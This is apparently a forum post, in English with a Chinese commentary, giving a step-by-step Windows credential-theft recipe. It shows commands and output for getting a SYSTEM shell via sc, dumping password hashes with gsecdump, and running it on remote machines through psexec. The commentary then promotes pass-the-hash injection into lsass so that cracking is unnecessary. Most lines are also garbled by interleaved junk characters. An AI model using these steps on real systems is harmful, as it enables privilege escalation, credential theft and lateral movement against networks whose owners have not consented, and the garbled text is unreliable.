o get a DOS Prompt as NT system:
2 ~2 I6 V X. F/ A/ R# U; f( C& T5 ~
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact# N# V% U+ W8 l
[SC] CreateService SUCCESS% ^8 ~1 Q: i+ m
9 O* F3 H6 f& f& A% EC:\>sc start shellcmdline
- ]/ w% m8 X E6 z- M) S3 ?. _[SC] StartService FAILED 1053:8 H8 F9 I9 w- v
# m! p3 Z0 w4 `9 J R2 U/ G) z1 {
The service did not respond to the start or control request in a timely fashion.
+ R2 j+ l+ D; \4 ~8 G$ W4 q
5 l/ j/ b0 H" D) t1 ^0 yC:\>sc delete shellcmdline
. ~. h" Q/ A; W5 v7 c* h[SC] DeleteService SUCCESS% R; m1 z4 _( M1 Z
, }2 {8 ?( J* ? J! }; ]+ u! B3 I------------
( U% k9 ? w# m3 \, X3 i+ ^- E( i! o- P6 h
Then in the new DOS window:
; R% i7 Q( F2 c/ v8 T7 p2 c8 @, y8 V( ?
Microsoft Windows XP [Version 5.1.2600]
( \" u3 s; k3 T: G% h- t(C) Copyright 1985-2001 Microsoft Corp.7 p6 O: F$ n9 Q% w+ t% n6 }! v0 ?
* P8 [% Q z/ a- W, cC:\WINDOWS\system32>whoami+ E' f A) N6 T& _( M+ R1 O
NT AUTHORITY\SYSTEM. h9 K, q2 l6 u" n. W
: {6 h$ `! Y9 o2 V! v4 _9 VC:\WINDOWS\system32>gsecdump -h
: t- f7 k% u6 N& `. t) Sgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
( A9 R" A* u7 P' A7 @% Qusage: gsecdump [options]
8 k: y; p3 }, f% c( O4 x6 m1 n( q2 ~+ }1 D C y
options:# f \3 [, _* p0 g& A- t# W, u
-h [ --help ] show help( r! Q$ n6 \! T. `3 ]; f
-a [ --dump_all ] dump all secrets
$ S6 \, S3 y5 @-l [ --dump_lsa ] dump lsa secrets
: c* `8 J0 E& m* c; I-w [ --dump_wireless ] dump microsoft wireless connections
8 D/ f% h$ |& M+ U-u [ --dump_usedhashes ] dump hashes from active logon sessions
3 O, C) K; D8 C3 Y! z" I-s [ --dump_hashes ] dump hashes from SAM/AD: U2 E7 [& w# z0 p7 x: \# X6 S% y
6 E& A6 F5 B8 U3 ]
Although I like to use:5 N8 M7 S8 ]$ w+ Q9 l" S6 g
( g1 _$ l( t7 {# U% R Z, P5 w
PsExec v1.83 - Execute processes remotely6 s4 w% r- `! h5 [7 o! |
Copyright (C) 2001-2007 Mark Russinovich1 g. K W j8 W3 e# N3 i" }! q
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
) j2 e& f) I5 i U, L# F2 f& i$ b
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT/ x' y0 Z- O$ r* S
1 O9 k1 \. i7 E7 Z v! F1 E3 uto get the hashes from active logon sessions of a remote system.& x& d' L* o, j8 i; N3 E
9 D* ^8 H2 B d9 J, |
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
. s( u1 p- w4 v g# `$ X# G f5 @9 W7 }" ]2 a
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
( g& N' ~2 M' Q* O+ M8 f) _) ?原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
; o+ C1 o6 m6 z" ]' ]8 h5 c/ _$ j v
2 c. h2 q0 A8 P$ o. P! v我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
2 @4 ^& H1 U$ T4 q( w2 b5 \ |
发表于 2012-11-6 21:09:29
收藏
支持
反对